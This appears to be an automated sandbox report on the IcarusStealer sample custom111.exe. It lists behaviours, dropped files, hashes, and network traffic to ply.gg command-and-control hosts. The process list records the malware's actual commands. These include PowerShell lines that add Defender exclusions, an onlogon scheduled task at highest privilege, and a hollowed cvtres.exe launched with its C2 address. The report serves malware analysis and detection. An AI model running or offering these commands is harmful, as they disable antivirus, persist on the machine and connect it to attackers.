Analysis Overview
SHA256
13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
Threat Level: Known bad
The file custom111.exe was found to be: Known bad.
Malicious Activity Summary
IcarusStealer
Modifies Installed Components in the registry
Checks computer location settings
Loads dropped DLL
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of SetThreadContext
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Creates scheduled task(s)
Modifies registry class
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Delays execution with timeout.exe
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-03-09 23:11
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-09 23:11
Reported
2024-03-09 23:15
Platform
win7-20240221-en
Max time kernel
139s
Max time network
166s
Command Line
Signatures
IcarusStealer
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| N/A | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\custom111.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\custom111.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File created | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2648 set thread context of 584 | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\custom111.exe
"C:\Users\Admin\AppData\Local\Temp\custom111.exe"
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\switched.exe
"C:\Users\Admin\AppData\Local\Temp\switched.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5n0bdwnb\5n0bdwnb.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9BF1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA4A75A4388864E329B20866A068E1E2.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpB77D.tmp.bat""
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | case-shield.gl.at.ply.gg | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| N/A | 127.0.0.1:49221 | tcp | |
| N/A | 127.0.0.1:49223 | tcp | |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | operating-noble.gl.at.ply.gg | udp |
| US | 147.185.221.18:52033 | operating-noble.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:49261 | tcp | |
| N/A | 127.0.0.1:49263 | tcp | |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
Files
\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 35aacbff43ce73ac748965648fb212e7 |
| SHA1 | df644ab54ed3964eacad3582d1d1ccc2c7c69b53 |
| SHA256 | be456f95a11dcaac58af77ed485750cdddcf441316bb9115ed3d5a907d74b428 |
| SHA512 | 77a45684c805a3ba4f29aae7485675952525f3e24da4be6d6acdf5031ac65509c5c71489827229632ed3ab3aea66de3b278da21cdd36992887029b0fb77ca876 |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 3fd4631f10c52fbf309d12f81fc774cd |
| SHA1 | c8bc6e2932f6f3acab757f9c99aac2937ef7df2d |
| SHA256 | fa200ad81e353e08cde26160a4274ba6155f6a1099e3d067e017e6d33c97690d |
| SHA512 | e18d36e23b47091cb2c68bd001ce780d276d7916c1f0e363322cfd267aadedc9403d09e7d014f39e28d912f48c576e57ad95b3e631121556b0df9987a9d20cfd |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 40c529a22af30de6652eb04416778890 |
| SHA1 | ba07f5d22bea758f7a4dd2b030a1af0ae4bee436 |
| SHA256 | 4752ed84c5b34e10b179429d480637e65e70ee4d2e066c7d1493dba2ad7272dd |
| SHA512 | 9ef7f8f73e7425c948e9b65c02daf70a9c3bc92e5a4be7d9c317657125ea9e132390cb23d3841578bd31b3440365b23bf012a40600f5599bb6ebe8a446049a38 |
C:\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | b9626891321e65693c80d0b157f10909 |
| SHA1 | 6e58399bc4f9c59433202d236cae32242d125604 |
| SHA256 | 61934ac3ebc67a45655fc1244cae901603429a8b6c351af12db56c7c863f054a |
| SHA512 | 5be22ab017db28f0f84097c82a2f53b4b85f154f2cbacf231bedaeb515acfb50101287762a479885a508444388838ab290d9ab07ff8781e36882aa44172c3592 |
\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | c46cd6f62175b7ea609b788edd41daa9 |
| SHA1 | 1ec4b6df279bd83fe25da8d6ad1d802dbb888079 |
| SHA256 | 2488f804e833a5e96425fbb1c2472eaa8f8d2b9ae452bf7aa04719f882579ffd |
| SHA512 | abf67169f116051de078d61b7d194f6c69188fc0d8e29bd228448f3788a122031cdd0a3bc6791efbd17a8f03459dbbd5bf3dc6a4b3529cece3e24ba27384e19d |
\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 8155b5412dd1d6fee09c7e0dccccf674 |
| SHA1 | 9fb57439e5bd9c02cfbe1a87c44a1a6bd316ad9a |
| SHA256 | 6223c85908acbb13b710d4cfa9f349887c93986b2e600c2575cf29ffbf780593 |
| SHA512 | 14b09dab7264848d3dfc0c33db69600b0e626ea68e99b409de987e1532af38d6f3b35e62131e535026479a6bb338b96d4a48541a6c42f29c892cf55253ae47d3 |
\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 0f0838bc6642dd6bc603368e50b4aba3 |
| SHA1 | 932bd4d1c11996bf8ac3ac74a94b266e96d44c36 |
| SHA256 | 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9 |
| SHA512 | a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860 |
memory/2496-20-0x0000000002AF0000-0x0000000002F2C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | ceb8c3c0f2249f05f3df8f88d46ae743 |
| SHA1 | 651675ba157c085ce64aa5bb2abbfd6f5efc75c6 |
| SHA256 | a047b5971bf32a48532d2dc9276f3f1208ebaa6ac2efe650bd827344fe86b778 |
| SHA512 | 872d88e2306b40567ec28bb96875fa91a37425e36ad8264a20ba9a29c4552a090fd6336747e7f65056203ce29fedab600aa51684fa525c5417be484bc6b1766a |
memory/2508-25-0x000000013F1B0000-0x000000013F5EC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 46040b3f061347eb5b8527a7bbc9a5e9 |
| SHA1 | 3b55c773e34efd03e5558a60faa4c74b53fc6da9 |
| SHA256 | fc5c4e248707860f8e1443eb70ff6ca97f58cdc9f7fee326b20361e372295cb5 |
| SHA512 | 079473e26d25a2356f6cb22b5073f419805532011cca7fcf40666ec29b1204226c6a3b9d03aabaa4f3ed5c57a1864402bc99fc9efe7e1e4a3c1257c6feec17d7 |
memory/2648-28-0x0000000000C20000-0x0000000000CA2000-memory.dmp
memory/2644-31-0x0000000074840000-0x0000000074F2E000-memory.dmp
memory/2644-30-0x0000000001310000-0x0000000001950000-memory.dmp
memory/2648-29-0x0000000074840000-0x0000000074F2E000-memory.dmp
memory/2648-32-0x0000000004D70000-0x0000000004DB0000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\5n0bdwnb\5n0bdwnb.cmdline
| MD5 | af186b32f809647fab5afc91797923dd |
| SHA1 | c9120467f60a618ed8e5dff002a7eff2cdd12ef8 |
| SHA256 | e2e3fc8cbca3830077ea8990351d69e412398c053aea2948f4ccba288268ef8f |
| SHA512 | 9112963501319a27d10da72a98a5507b22b8037d0bd269b5d5b3d58eb2aee915e22710277a28a28dca2a5dfac469851c1a3084a8ca6e95adb4fa9f9d5feaeea3 |
\??\c:\Users\Admin\AppData\Local\Temp\5n0bdwnb\5n0bdwnb.0.cs
| MD5 | 14846c9faaef9299a1bf17730f20e4e6 |
| SHA1 | 8083da995cfaa0e8e469780e32fcff1747850eb6 |
| SHA256 | 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b |
| SHA512 | 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCA4A75A4388864E329B20866A068E1E2.TMP
| MD5 | e9144225655a1177485a6238f397718e |
| SHA1 | 0618d989814312c38b8005fc469222f891470642 |
| SHA256 | f2ff3d3919bf3120bd18978b0225c56b53eec3a645493f7fe08344671cacb21d |
| SHA512 | 392b9684bc1c0d054a397bb8ed54bc682a59ea6c1c12abad5d70ec2f0065afec4645cae8c2672ec4571d5763397092388b944cd5c7582a4aa685ecd4e3a0c2a4 |
C:\Users\Admin\AppData\Local\Temp\RES9BF1.tmp
| MD5 | 452afe7f7c5d533da7a89b7718c8f7d4 |
| SHA1 | 4443fa6160ae272bb372f006d15cf2018c275e2e |
| SHA256 | a17b9030f29f97f7028e494559e8be0e6b4682bb28ad3e2c1a278b63c46ddee6 |
| SHA512 | a885b467f58d4584c5fa1c0cdb9d4d220daf3a0e54d965296d287bd8ede7d357dfc8c972231e0592add230dd7f85361f34e7e4dacd68ae9e8a4f2989963407e0 |
memory/584-45-0x0000000000400000-0x0000000000424000-memory.dmp
memory/584-47-0x0000000000400000-0x0000000000424000-memory.dmp
memory/584-51-0x0000000000400000-0x0000000000424000-memory.dmp
memory/584-49-0x0000000000400000-0x0000000000424000-memory.dmp
memory/584-53-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/584-54-0x0000000000400000-0x0000000000424000-memory.dmp
memory/584-56-0x0000000000400000-0x0000000000424000-memory.dmp
memory/584-58-0x0000000000400000-0x0000000000424000-memory.dmp
memory/584-59-0x0000000074840000-0x0000000074F2E000-memory.dmp
memory/584-60-0x0000000004A00000-0x0000000004A40000-memory.dmp
memory/2508-62-0x000000013F1B0000-0x000000013F5EC000-memory.dmp
memory/2648-61-0x0000000074840000-0x0000000074F2E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 8efb09602ffe759f55fde01c907ad5b1 |
| SHA1 | ef4cf61196dad051b36af62304336e98d3014490 |
| SHA256 | 43686d3cf96e0bd908b185cee7ca005ed84cccb6dff460d0b3b3d62446e62923 |
| SHA512 | bec1fe03514dc57016ecb0e1346e050226fa63c54cdfb9211d73d60922de4244aa9cb59092372936763d8696eb26b3da0833e883b6938f3ba6eeb620c9943dac |
memory/2644-70-0x0000000000F50000-0x0000000000F90000-memory.dmp
memory/1456-71-0x000000006FB50000-0x00000000700FB000-memory.dmp
memory/2724-72-0x000000006FB50000-0x00000000700FB000-memory.dmp
memory/2724-73-0x0000000002210000-0x0000000002250000-memory.dmp
memory/1456-74-0x000000006FB50000-0x00000000700FB000-memory.dmp
memory/1456-76-0x0000000000470000-0x00000000004B0000-memory.dmp
memory/2724-75-0x000000006FB50000-0x00000000700FB000-memory.dmp
memory/1456-79-0x0000000000470000-0x00000000004B0000-memory.dmp
memory/2644-80-0x0000000074840000-0x0000000074F2E000-memory.dmp
memory/1784-81-0x0000000003FE0000-0x0000000003FE1000-memory.dmp
memory/1456-93-0x000000006FB50000-0x00000000700FB000-memory.dmp
memory/2724-92-0x000000006FB50000-0x00000000700FB000-memory.dmp
C:\Windows\System32\catroot\$SXR\$SXR.exe
| MD5 | e83215165939567f1ee561e8e54790c7 |
| SHA1 | dfa905ca145188a32525c1df68b6a2336aaecf30 |
| SHA256 | ce5d4d869c07e41ee190d929d144625b1bac3b080271d9ed91177a9c8949446f |
| SHA512 | 838cd1548883c7dffad0507e9efbe1f2457c7c17ecbc0d7933616ecda26ddb659d93bdd77a47556d91174a9e3244da5ae0080beda589f126baa507acf5cc1388 |
C:\Users\Admin\AppData\Local\Temp\tmpB77D.tmp.bat
| MD5 | 4d9ac8e3fb2d62aca415e1c72b5d4218 |
| SHA1 | 0417b62d441182f03f6ecfe31068571325a6fd3d |
| SHA256 | e9f620eb9a43958a1507ee79eef85c7a909aaf0a862644df2168cc693f1aaa31 |
| SHA512 | d019114d3eae5a4a56982de82281c489fd355c0243d7cc281195e03fbab022acc516c47d038af18fddb43ac0b7c89dc86e80a2f189f7945c9eceff8fe5b0b018 |
memory/2644-94-0x0000000074840000-0x0000000074F2E000-memory.dmp
memory/584-96-0x0000000074840000-0x0000000074F2E000-memory.dmp
C:\Windows\System32\catroot\$SXR\$SXR.exe
| MD5 | 69766462ca23c47016ea68ca62b33a75 |
| SHA1 | fe44d459445b082804aa33bac32b5ad710f84e1a |
| SHA256 | d02d7a0e8fa78c73e694d0cc6b863e313387124ebf7fe120402d882aa8cdd449 |
| SHA512 | 7b721a90c026d120838f2e8a855280054b34e591195c8d7293f2a82f16bf5c2cb3d50dbb41c599e1a36a58e04d400472e0840fdaa80b108b149b1e1ed630b469 |
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
| MD5 | eca707459e723fc7a27e8a6881a0138b |
| SHA1 | 557c262cf7f08b670a87e36f89003c2e2efbf6dd |
| SHA256 | 98f612596111bd83389be63bd0387ecf1210a13bd7be036ef2cf11d1c4473a16 |
| SHA512 | 425842b40b321cd099dec0ba2a60d051b817c511df1f2cd4d264df6c5e8ee217a10f3e481fa2a36ca1e94d22c49d98884853022e8c348b20ed64c6c9a845628d |
\Windows\System32\catroot\$SXR\$SXR.exe
| MD5 | f1f4f0ebd555a222a09aec7bed2ba78a |
| SHA1 | 39e5e37bdbd640aff7a74e8930cb9e6f810007df |
| SHA256 | c7fa50bcfbec3474718592017a9b5b1d1085a3cba2d5e386f5019cfcd319d5ae |
| SHA512 | f0e582a5f7b230d238923834b72c83ac9310f3788db1e52ea3f00b94396332dbd5f7e84158a3d96f3657a1c081b6c48347e795067425b2f280a3db111d5b0fe2 |
memory/3068-101-0x0000000074840000-0x0000000074F2E000-memory.dmp
memory/3068-102-0x00000000011F0000-0x0000000001830000-memory.dmp
memory/3068-103-0x00000000004C0000-0x0000000000500000-memory.dmp
C:\Windows\System32\CatRoot\$SXR\Read.txt
| MD5 | 79668a6729f0f219835c62c9e43b7927 |
| SHA1 | 0cbbc7cc8dbd27923b18285960640f3dad96d146 |
| SHA256 | 6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e |
| SHA512 | bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3 |
C:\Users\Admin\AppData\Roaming\temp0923
| MD5 | f54e0ad084d6b44f4a7ff94514ba0fb8 |
| SHA1 | 3e168eb2b1b20a00c079ce59941e4235a5129534 |
